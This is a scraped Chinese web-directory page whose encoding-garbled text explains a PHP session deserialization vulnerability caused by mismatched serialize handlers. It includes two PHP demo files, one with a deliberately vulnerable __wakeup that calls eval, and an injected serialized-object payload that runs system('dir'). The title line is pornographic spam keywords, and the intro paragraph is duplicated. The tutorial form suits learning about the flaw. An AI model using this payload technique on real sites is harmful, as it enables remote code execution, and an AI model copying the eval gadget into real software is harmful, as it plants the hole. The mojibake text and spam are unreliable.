日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長(zhǎng)提供免費(fèi)收錄網(wǎng)站服務(wù),提交前請(qǐng)做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(wù)(50元/站),

點(diǎn)擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:52000
  • 待審:37
  • 小程序:12
  • 文章:1037587
  • 會(huì)員:756

目錄

    PHP session

    php三種序列化處理器

    php小編魚仔今天為大家?guī)?lái)一篇關(guān)于php session反序列化漏洞的深入探究文章。php session機(jī)制是web開發(fā)中非常重要的一環(huán),然而不當(dāng)?shù)氖褂脮?huì)導(dǎo)致一些安全隱患,其中session反序列化漏洞就是一種常見的攻擊方式,可能導(dǎo)致嚴(yán)重后果。本文將深入探究這種漏洞的原理、危害以及預(yù)防措施,幫助廣大web開發(fā)者更好地保障自己的系統(tǒng)安全。

    PHP session

    php session 反序列化漏洞存在的原因:當(dāng)序列化session和讀取反序列化字符時(shí)采用的序列化選擇器不一樣時(shí),處理的方法不一樣。

    php小編魚仔今天為大家?guī)?lái)一篇關(guān)于php session反序列化漏洞的深入探究文章。php session機(jī)制是web開發(fā)中非常重要的一環(huán),然而不當(dāng)?shù)氖褂脮?huì)導(dǎo)致一些安全隱患,其中session反序列化漏洞就是一種常見的攻擊方式,可能導(dǎo)致嚴(yán)重后果。本文將深入探究這種漏洞的原理、危害以及預(yù)防措施,幫助廣大web開發(fā)者更好地保障自己的系統(tǒng)安全。

    php三種序列化處理器

    序列化處理器
    php ? ??? ??? ?(php默認(rèn)中使用的序列化) ? 存儲(chǔ)格式為:鍵名 + 豎線 + 經(jīng)過(guò)serialize()函數(shù)反序列化處理的值

    php_binary ? 存儲(chǔ)格式:鍵名的長(zhǎng)度對(duì)應(yīng)的ASCII字符 + 鍵名 + 經(jīng)過(guò)serialize()函數(shù)反序列化處理的值

    php_serialize 在php版本>5.5.4中可以選擇使用 ? 存儲(chǔ)格式:經(jīng)過(guò)serialize()函數(shù)反序列處理的數(shù)組

    通過(guò)php.ini 可以設(shè)置保存路徑配置 php session 參數(shù)是 session.save_path=“保存路徑”

    php 中配置session序列化處理器通過(guò)ini_set()方法進(jìn)行選擇 :ini_set(‘session.serialize_handler’, ‘處理器’);

    生成session php_serialize序列化處理器

    demo2.php
    <?php
    ini_set('session.serialize_handler', 'php_serialize');
    session_start();//創(chuàng)建一個(gè)session 會(huì)話(當(dāng)客戶端第一次訪問(wèn)時(shí)會(huì)生成一個(gè)隨機(jī)的session文件在指定保存目錄中)
    $_SESSION['session'] = $_GET['k'];
    var_dump($_SESSION);
    

    登錄后復(fù)制

    訪問(wèn)該頁(yè)面

    查看session 文件保存路徑,生成了一個(gè)sess_一串隨機(jī)字符的文件,打開文件查看,從get提交的值以序列化的格式存儲(chǔ)到該文件。

    在讀取session時(shí)使用不一樣的序列化處理器,使用php_serialize 序列化處理會(huì)把 符號(hào) “|“作為一個(gè)正常的字符處理。而php序列化處理器會(huì)把”|” 當(dāng)成分割符處理。

    ctf.php
    <?php
    ini_set('session.serialize_handler', 'php');
    session_start();
    class test{
    public $name;
    function __wakeup(){
    eval($this->name);
    }
    }
    

    登錄后復(fù)制

    構(gòu)造成反序列化payload為:k=|O:4:“test”:1:{s:4:“name”;s:17:“system(‘dir’);”;}

    訪問(wèn)demo2.php

    查看sess文件內(nèi)容:| 分割符被傳遞了進(jìn)去

    再訪問(wèn)ctf.php,觸發(fā)了__wakeup函數(shù)從而執(zhí)行了eval代碼執(zhí)行命令,由于使用不同的序列化處理器來(lái)處理session文件,序列化對(duì)特殊符號(hào)的處理方法不一樣,從而導(dǎo)致產(chǎn)生了漏洞

分享到:
標(biāo)簽:PHPsession 序列化 探究 漏洞
用戶無(wú)頭像

網(wǎng)友整理

注冊(cè)時(shí)間:

網(wǎng)站:5 個(gè)   小程序:0 個(gè)  文章:12 篇

  • 52000

    網(wǎng)站

  • 12

    小程序

  • 1037587

    文章

  • 756

    會(huì)員

趕快注冊(cè)賬號(hào),推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨(dú)大挑戰(zhàn)2018-06-03

數(shù)獨(dú)一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過(guò)答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫(kù),初中,高中,大學(xué)四六

運(yùn)動(dòng)步數(shù)有氧達(dá)人2018-06-03

記錄運(yùn)動(dòng)步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績(jī)?cè)u(píng)定2018-06-03

通用課目體育訓(xùn)練成績(jī)?cè)u(píng)定